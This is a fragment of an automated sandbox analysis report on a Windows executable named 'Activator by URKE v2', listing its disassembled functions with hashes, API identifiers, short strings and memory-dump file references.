                                                                                                                                                                                                                                                  • Instruction ID: b25238a2539f5b07a6a70f847a45a72f87011ba43d3f30cd367750e7ae5221ea
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251F732B0960686DB54EF15E660BB9B795FB44FA4F908172DE0E83749DF38E841CB21
                                                                                                                                                                                                                                                  Function 00007FF7E5F0B7B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$Show$Rect
                                                                                                                                                                                                                                                  • String ID: RarHtmlClassName
                                                                                                                                                                                                                                                  • API String ID: 2396740005-1658105358
                                                                                                                                                                                                                                                  • Opcode ID: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                                                                                                                                                                                                                                  • Instruction ID: 7e360427ef429a5288097f35e6d253f785426b847048d98cd617c80219b5dec3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB51956660878986EA24EB25E4703BEE7A0FB85F84F844132DE8E83B55CF3CE405C711
                                                                                                                                                                                                                                                  Function 00007FF7E5F13810 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                  • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                                                                  • API String ID: 3540648995-3493335439
                                                                                                                                                                                                                                                  • Opcode ID: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                                                                                                                                                                                                                                  • Instruction ID: 516abe0c22d58f49bb067f1fdea551047247a1f4095385310f18068e202af661
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E31C162A14B0984EB00AB65D9A42EDB371EB44F98F840136DE4D97AA9CE3CD081C361
                                                                                                                                                                                                                                                  Function 00007FF7E5F13994 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                                                                  • API String ID: 0-56093855
                                                                                                                                                                                                                                                  • Opcode ID: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                                                                                                  • Instruction ID: 4502c88def4379e53369e67adea6fd75f6373802a3549d1228258780f72d5d68
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E213D6490CA4F81EA10AB19F9647E4B7A1BF44F89FD40033C58DC7365DE3DE6558322
                                                                                                                                                                                                                                                  Function 00007FF7E5F1F490 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  • Opcode ID: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                                                                                                  • Instruction ID: 189647a145b0ade6576a464fc0bbb0c4ab36a236153de099e939c85cbf7cac43
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F04465A1964A81EF54AB51F4A43F9A360EF88F90F841036DD4F86665DE3CE484C722
                                                                                                                                                                                                                                                  Function 00007FF7E5F27AD4 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                                  • Opcode ID: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                                                                                                                                                                                                                                  • Instruction ID: 6776fa7ac3e81a8461088fd7319fa86789829c503b3f49cfae4653827cdb7cb9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B81A1AAE1961A85F720BF6584607FDA6A4BB44F98FC04137CD0ED3799CE3CA445C322
                                                                                                                                                                                                                                                  Function 00007FF7E5F27448 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3659116390-0
                                                                                                                                                                                                                                                  • Opcode ID: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
                                                                                                                                                                                                                                                  • Instruction ID: 7f64e32c53c2c10672cedf6b8c7349374672c108954a5210d9a56946711692b8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6351F176E15A5589E710DF25E4547ECBBB0BB44B88F448136CE4E87B98DF38D141C722
                                                                                                                                                                                                                                                  Function 00007FF7E5F228A4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 190572456-0
                                                                                                                                                                                                                                                  • Opcode ID: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
                                                                                                                                                                                                                                                  • Instruction ID: 0030037a68d71f0abc5ec60f5e79f6a16fb55be52b2411b33a4b3d69d66dc7f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE41E6A5B1960A41FA15BB0268247F5B396BF58FE0F894536DD1DCB784DF3CE4409222
                                                                                                                                                                                                                                                  Function 00007FF7E5F28BE8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                                                                  • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                                                                                                                                                  • Instruction ID: 49bc340d6f2bf2e89375c5f05132531001abf77334ddb165ddabedbdf1fbcd9e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F01190FAE99B0B05FA5831E4E5713F580456F54FB0E884632EA6D825D6CF7C68804223
                                                                                                                                                                                                                                                  Function 00007FF7E5F13928 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3621893840-0
                                                                                                                                                                                                                                                  • Opcode ID: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
                                                                                                                                                                                                                                                  • Instruction ID: 7dc554d90e97ef5d48302ced8e8ac043de0b3209e83b890fe1c9e5d5ac0676a3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F04F62B2854A83F750A730E465BBAA212EFA4F05FC41032DA4F829A59E3CD549CF21
                                                                                                                                                                                                                                                  Function 00007FF7E5F197EC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __except_validate_context_recordabort
                                                                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                                                                  • API String ID: 746414643-3733052814
                                                                                                                                                                                                                                                  • Opcode ID: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
                                                                                                                                                                                                                                                  • Instruction ID: 787b563fe40db8769404517065827d10d1f9d2c08f7cef08217ce19c1b57facd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1271D4726086C58ADB20AF25D2603BDBBA0EB01F94F848137DE4D87A86CF3CD555C792
                                                                                                                                                                                                                                                  Function 00007FF7E5F1B54C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                  • String ID: $*
                                                                                                                                                                                                                                                  • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                                                  • Opcode ID: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
                                                                                                                                                                                                                                                  • Instruction ID: 95f7c44d0ba8ea3d0cf0de4e9eb392f4f77220f6d059de6e66901728919d1334
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d78f14ac5553cfb584130670f8383fb7251d5d940d13a47ddc6d8be45c653cc9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9151447290D64ACAE769AF3582743BC7AA0EB15F49F94117BC689C319ACF38D441C622
                                                                                                                                                                                                                                                  Function 00007FF7E5F19C30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 2466640111-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                                                                                                                                                                                                                  • Instruction ID: ea462082552c43aec935b4dcb17e6ca1387e0853a85090761ea132f3d9ef9cb6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b2257290adfa2781d5b09c2d1616d864f17ca53d9f431228db0fbfec44e584e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B651AD3761874583D620AB16E6503AEB7A4FB88F90F840536EB8D83B56CF38E451CB52
                                                                                                                                                                                                                                                  Function 00007FF7E5F27874 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                                  • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                                  • Opcode ID: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                                                                                                                                                                                                                                  • Instruction ID: 13179e75f17944f65a87eeb1bd8911525b50149da858c09f1a78a1bf85861c14
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20302cc878b90de32ea97a9ef5a303d772ca5a33c3583031ee23a301797e927
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD41A462A1AB4982E710AF25E8543FAB761FB88B94F804132EE4DC7744DF3CD545C752
                                                                                                                                                                                                                                                  Function 00007FF7E5F0CCEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
